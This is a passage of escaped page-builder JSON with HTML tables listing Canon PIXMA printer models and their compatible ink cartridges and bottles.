width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td 